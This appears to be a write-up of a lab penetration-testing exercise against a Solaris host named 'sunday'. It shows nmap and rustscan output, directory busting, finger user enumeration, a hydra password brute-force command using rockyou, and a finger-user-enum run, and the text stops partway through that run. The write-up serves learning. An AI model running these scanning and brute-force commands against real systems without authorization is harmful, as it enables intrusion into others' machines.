Enumeration
nmap and rustscan.
nmap
Command: nmap -A -p- -T4 -Pn -vv -oN nmap-report-tcp.txt 10.10.10.76
Result:
Nmap scan report for 10.10.10.76
Host is up, received user-set (0.30s latency).
Not shown: 65501 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
79/tcp open finger? syn-ack
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
515/tcp open printer syn-ack
3749/tcp filtered cimtrak no-response
...
4876/tcp filtered tritium-can no-response
6787/tcp open ssl/http syn-ack Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
| http-title: Solaris Dashboard
|_Requested resource was https://10.10.10.76:6787/solaris/
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Issuer: commonName=sunday/organizationName=Host Root CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-08T19:40:00
| Not valid after: 2031-12-06T19:40:00
| MD5: 6bd3:4b32:c05a:e5fe:a8c8:61f0:4361:414a
| SHA-1: a5eb:c880:968c:84aa:10b2:a944:bad2:56ca:aed5:b66a
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcqgAwIBAgIHAIqqcz45jjALBgkqhkiG9w0BAQswKDEVMBMGA1UEChMM
| SG9zdCBSb290IENBMQ8wDQYDVQQDEwZzdW5kYXkwHhcNMjExMjA4MTk0MDAwWhcN
| MzExMjA2MTk0MDAwWjARMQ8wDQYDVQQDEwZzdW5kYXkwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQC67wVPVDRPU/Sahp2QnHx2NlMUQrkyBJrr4TSjS9v6
| /DFKqf3m2XnYuKyFl9BAO8Mi+Hz3ON4nZWmigZGX6LnJpci6whB89pLZdcogruB8
| YMyGuP8y2v3orEBLQ5NrcP6fcKLMp+6PXurvuZDgPH+oXHJyp/w//pkBROQRC0oN
| 8dx7Zq2t4ZfDiqhgw1j79V7kZNOjKp8gU1HmQ/BjYEaOfVZNwuTVyqUtfcjuxIio
| JEHaVmhNV9Xp9DAOLBFuTXpsJe3anSjGGP0DWMyNOps2VrZUyJwC22U5jlcp7Rj/
| WWE5gnm6ClH44DXlKMIt8O2vq0MfqvvGeSIFbSOPb6Q3AgMBAAGjKjAoMBEGA1Ud
| EQQKMAiCBnN1bmRheTATBgNVHSUEDDAKBggrBgEFBQcDATALBgkqhkiG9w0BAQsD
| ggEBAC/f3nN6ur2oSSedYNIkf6/+MV3qu8xE+Cqt/SbSk0uSmQ7hYpMhc8Ele/gr
| Od0cweaClKXEhugRwfVW5jmjJXrnSZtOpyz09dMhZMA9RJ9efVfnrn5Qw5gUriMx
| dFMrAnOIXsFu0vnRZLJP7E95NHpZVECnRXCSPjp4iPe/vyl1OuoVLBhoOwZ8O7zw
| WlP/51SiII8LPNyeq+01mCY0mv3RJD9uAeNJawnFwsCo/Tg9/mjk0zxUMaXm80Bb
| qsSmST23vYwuPw3c/91fJI4dWb7uEZJa55hRIU0uMPOLOUpN1kKkGPO+7QCzfedc
| WPptRhU+2UMGhFXHyGV5EJp2zvc=
|_-----END CERTIFICATE-----
...
22022/tcp open ssh syn-ack OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsG4q9TS6eAOrX6zI+R0CMMkCTfS36QDqQW5NcF/v9vmNWyL6xSZ8x38AB2T+Kbx672RqYCtKmHcZMFs55Q3hoWQE7YgWOJhXw9agE3aIjXiWCNhmmq4T5+zjbJWbF4OLkHzNzZ2qGHbhQD9Kbw9AmyW8ZS+P8AGC5fO36AVvgyS8+5YbA05N3UDKBbQu/WlpgyLfuNpAq9279mfq/MUWWRNKGKICF/jRB3lr2BMD+BhDjTooM7ySxpq7K9dfOgdmgqFrjdE4bkxBrPsWLF41YQy3hV0L/MJQE2h+s7kONmmZJMl4lAZ8PNUqQe6sdkDhL1Ex2+yQlvbyqQZw3xhuJ
| 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII/0DH8qZiCfAzZNkSaAmT39TyBUFFwjdk8vm7ze+Wwm
...
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94%I=7%D=9/23%Time=650F0A2D%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\
SF:?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\
SF:r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x20
SF:\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x2
SF:0When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(SS
SF:LSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20\
SF:x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20
SF:\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");
rustscan
Command: rustscan -a 10.10.10.76 -r 1-65535 --ulimit 5000 -- -A
Result:
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.76:111
Open 10.10.10.76:79
Open 10.10.10.76:515
Open 10.10.10.76:6787
Open 10.10.10.76:22022
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A" on ip 10.10.10.76
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org )
...
Scanning 10.10.10.76 [5 ports]
...
PORT STATE SERVICE REASON VERSION
79/tcp open finger? syn-ack
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
|_finger: No one logged on\x0D
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
515/tcp open printer syn-ack
6787/tcp open ssl/http syn-ack Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Issuer: commonName=sunday/organizationName=Host Root CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-08T19:40:00
| Not valid after: 2031-12-06T19:40:00
| MD5: 6bd3:4b32:c05a:e5fe:a8c8:61f0:4361:414a
| SHA-1: a5eb:c880:968c:84aa:10b2:a944:bad2:56ca:aed5:b66a
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcqgAwIBAgIHAIqqcz45jjALBgkqhkiG9w0BAQswKDEVMBMGA1UEChMM
| SG9zdCBSb290IENBMQ8wDQYDVQQDEwZzdW5kYXkwHhcNMjExMjA4MTk0MDAwWhcN
| MzExMjA2MTk0MDAwWjARMQ8wDQYDVQQDEwZzdW5kYXkwggEiMA0GCSqGSIb3DQEB
| AQUAA4IBDwAwggEKAoIBAQC67wVPVDRPU/Sahp2QnHx2NlMUQrkyBJrr4TSjS9v6
| /DFKqf3m2XnYuKyFl9BAO8Mi+Hz3ON4nZWmigZGX6LnJpci6whB89pLZdcogruB8
| YMyGuP8y2v3orEBLQ5NrcP6fcKLMp+6PXurvuZDgPH+oXHJyp/w//pkBROQRC0oN
| 8dx7Zq2t4ZfDiqhgw1j79V7kZNOjKp8gU1HmQ/BjYEaOfVZNwuTVyqUtfcjuxIio
| JEHaVmhNV9Xp9DAOLBFuTXpsJe3anSjGGP0DWMyNOps2VrZUyJwC22U5jlcp7Rj/
| WWE5gnm6ClH44DXlKMIt8O2vq0MfqvvGeSIFbSOPb6Q3AgMBAAGjKjAoMBEGA1Ud
| EQQKMAiCBnN1bmRheTATBgNVHSUEDDAKBggrBgEFBQcDATALBgkqhkiG9w0BAQsD
| ggEBAC/f3nN6ur2oSSedYNIkf6/+MV3qu8xE+Cqt/SbSk0uSmQ7hYpMhc8Ele/gr
| Od0cweaClKXEhugRwfVW5jmjJXrnSZtOpyz09dMhZMA9RJ9efVfnrn5Qw5gUriMx
| dFMrAnOIXsFu0vnRZLJP7E95NHpZVECnRXCSPjp4iPe/vyl1OuoVLBhoOwZ8O7zw
| WlP/51SiII8LPNyeq+01mCY0mv3RJD9uAeNJawnFwsCo/Tg9/mjk0zxUMaXm80Bb
| qsSmST23vYwuPw3c/91fJI4dWb7uEZJa55hRIU0uMPOLOUpN1kKkGPO+7QCzfedc
| WPptRhU+2UMGhFXHyGV5EJp2zvc=
|_-----END CERTIFICATE-----
| http-title: Solaris Dashboard
|_Requested resource was https://10.10.10.76:6787/solaris/
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
22022/tcp open ssh syn-ack OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsG4q9TS6eAOrX6zI+R0CMMkCTfS36QDqQW5NcF/v9vmNWyL6xSZ8x38AB2T+Kbx672RqYCtKmHcZMFs55Q3hoWQE7YgWOJhXw9agE3aIjXiWCNhmmq4T5+zjbJWbF4OLkHzNzZ2qGHbhQD9Kbw9AmyW8ZS+P8AGC5fO36AVvgyS8+5YbA05N3UDKBbQu/WlpgyLfuNpAq9279mfq/MUWWRNKGKICF/jRB3lr2BMD+BhDjTooM7ySxpq7K9dfOgdmgqFrjdE4bkxBrPsWLF41YQy3hV0L/MJQE2h+s7kONmmZJMl4lAZ8PNUqQe6sdkDhL1Ex2+yQlvbyqQZw3xhuJ
| 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII/0DH8qZiCfAzZNkSaAmT39TyBUFFwjdk8vm7ze+Wwm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94%I=7%D=9/23%Time=650F023F%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\
SF:?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\
SF:r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x20
SF:\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x2
SF:0When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(SS
SF:LSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20\
SF:x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20
SF:\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")
...Skimming for a bit, I found that port 6787 is opened.
I try to use default credentials, but no result. Looking at the “view source” found that this is an Oracle product that released in 2018, approximately.
With nothing found, I head to directory busting using gobuster and feroxbuster.
Gobuster
Command: gobuster dir -u https://sunday.htb:6787 -w /usr/share/wordlists/dirb/common.txt -x php -k
Result:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://sunday.htb:6787
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.hta.php (Status: 403) [Size: 217]
/.htaccess (Status: 403) [Size: 218]
/.htaccess.php (Status: 403) [Size: 222]
/.htpasswd (Status: 403) [Size: 218]
/.htpasswd.php (Status: 403) [Size: 222]
/~http (Status: 403) [Size: 214]
/~http.php (Status: 403) [Size: 218]
/~httpd.php (Status: 403) [Size: 219]
/~httpd (Status: 403) [Size: 215]
/jhtml (Status: 403) [Size: 214]
/jhtml.php (Status: 403) [Size: 218]
/phtml.php (Status: 403) [Size: 218]
/phtml (Status: 403) [Size: 214]
/rhtml (Status: 403) [Size: 214]
/rhtml.php (Status: 403) [Size: 218]
/server-status (Status: 403) [Size: 222]
/shtml (Status: 403) [Size: 214]
/shtml.php (Status: 403) [Size: 218]
/solaris (Status: 302) [Size: 216] [--> https://sunday.htb:6787/solaris/]
/xhtml (Status: 403) [Size: 214]
/xhtml.php (Status: 403) [Size: 218]
===============================================================
Finished
===============================================================
Feroxbuster
Command: feroxbuster -u https://sunday.htb:6787 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x sh,sql,csv,xlsx,php,txt -k -C 404
Result:
Lots of 403 (Forbidden) from gobuster. Feroxbuster found /solaris/index.html and found nothing there, only loading animation.
While waiting for feroxbuster finish it’s enumeration, I try to look again at nmap result and found one port which is opened but nmap doesn’t know what service is it.
The port itself is interesting. I use nmap to see what it is. Based on google, the service it held is finger. So, I search for finger.nse on /usr/share/nmap/scripts and use it as a script.
Command: sudo nmap -p 79 -sV -O -vv --script=finger sunday.htb
PORT STATE SERVICE REASON VERSION
79/tcp open finger? syn-ack ttl 59
| fingerprint-strings:
| GenericLines:
| No one logged on
| GetRequest:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| HTTPOptions:
| Login Name TTY Idle When Where
| HTTP/1.0 ???
| OPTIONS ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
| RTSP/1.0 ???
| SSLSessionReq, TerminalServerCookie:
|_ Login Name TTY Idle When Where
|_finger: No one logged on\x0D
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94%I=7%D=9/26%Time=65130D9F%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login\x20
SF:\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x2
SF:0\x20When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nGET\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\
SF:?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:?\?\?\r\n")%r(Help,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\nHELP\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\?\?\?\r\n")%r(HTTPOptions,93,"Login\x20\x20\x20\x20\x20\x20\x20Name\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\
SF:r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\?\?\?\r\nHTTP/1\.0\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(RTSPRequest,93,"Login\x20\x20
SF:\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x2
SF:0When\x20\x20\x20\x20Where\r\n/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nOPTIONS\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\nRTSP/1\.0\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n")%r(SS
SF:LSessionReq,5D,"Login\x20\x20\x20\x20\x20\x20\x20Name\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20TTY\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20Idle\x20\x20\x20\x20When\x20\x20\x20\x20Where\r\n\x16\x03\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\?\?\?\r\n")%r(TerminalServerCookie,5D,"Login\x20\x20\x20\x20\x20\
SF:x20\x20Name\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:TTY\x20\x20\x20\x20\x20\x20\x20\x20\x20Idle\x20\x20\x20\x20When\x20\x20
SF:\x20\x20Where\r\n\x03\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Oracle Solaris 10 (94%), Oracle Solaris 11 (94%), Oracle Solaris 11 or OpenIndiana (93%), Sun Solaris 11.3 (93%), OpenIndiana oi_147 - oi_148 (91%), Nexenta OS 3.0 - 3.1.2 (OpenSolaris snv_130 - snv_134f) (91%), Sun Solaris 11 (snv_151a) or OpenIndiana oi_147 (91%), Sun Solaris 11 (snv_151a) or OpenIndiana oi_147 - oi_151a (91%), Sun OpenSolaris snv_129 (91%), Sun Solaris 11 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94%E=4%D=9/26%OT=79%CT=%CU=38830%PV=Y%DS=2%DC=I%G=N%TM=65130E04%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=109%CI=I%II=I%TS=7)
OPS(O1=ST11M53CNW2%O2=ST11M53CNW2%O3=NNT11M53CNW2%O4=ST11M53CNW2%O5=ST11M53CNW2%O6=ST11M53C)
WIN(W1=FA4C%W2=FA4C%W3=FA38%W4=FA3B%W5=FA3B%W6=FFF7)
ECN(R=Y%DF=Y%T=3C%W=FB40%O=M53CNNSNW2%CC=Y%Q=)
T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=Y%DF=Y%T=3C%W=FA09%S=O%A=S+%F=AS%O=ST11M53CNW2%RD=0%Q=)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=Y%DF=N%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=Y%T=FF%CD=S)
...
Nmap found that it is a Oracle Solaris 10. It seems that all of them are consists of table with column name Login, Name, TTY, Idle, When, and Where.
Searching for a while in google, found hacktricks website about finger.
Foothold
So that’s how to enumerate this finger service. There is a program named “finger” in kali linux that I can use for enumeration.
Command: finger admin@sunday.htb
Result:
Login Name TTY Idle When Where
adm Admin < . . . . >
dladm Datalink Admin < . . . . >
netadm Network Admin < . . . . >
netcfg Network Configuratio < . . . . >
dhcpserv DHCP Configuration A < . . . . >
ikeuser IKE Admin < . . . . >
lp Line Printer Admin < . . . . >
Command: finger user@sunday.htb
Result:
Login Name TTY Idle When Where
aiuser AI User < . . . . >
openldap OpenLDAP User < . . . . >
nobody NFS Anonymous Access < . . . . >
noaccess No Access User < . . . . >
nobody4 SunOS 4.x NFS Anonym < . . . . >After searching for more information, I found this article. So, I try to use hydra using username.txt with username from above and rockyou as password, attacking port 515. That port is being attacked because it is a printer service and from finger we found “lp” which is Line Printer Admin. Default port for rlogin is 513, meanwhile nmap didn’t found it.
Command: hydra -L username.txt -P /usr/share/wordlists/rockyou.txt rlogin://sunday.htb:515
Result:
(Spoiler) NoneWhile enumerating for the this, I try to see if there are any SSL Heartbleed vulnerability. Turns out there is no Heartbleed vulnerability.
Command: nmap --script=ssl-heartbleed.nse -v -sV -p 6787 10.10.10.76
Result:
NoneWith nothing in mind, now I try to use finger-user-enum.
Command: ./finger-user-enum.pl -U /usr/share/wordlists/rockyou.txt -t 10.10.10.76 -p 79
Result:
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/rockyou.txt
Target count ............. 1
Username count ........... 14344391
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started #########
789456@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
7777777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
789456123@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
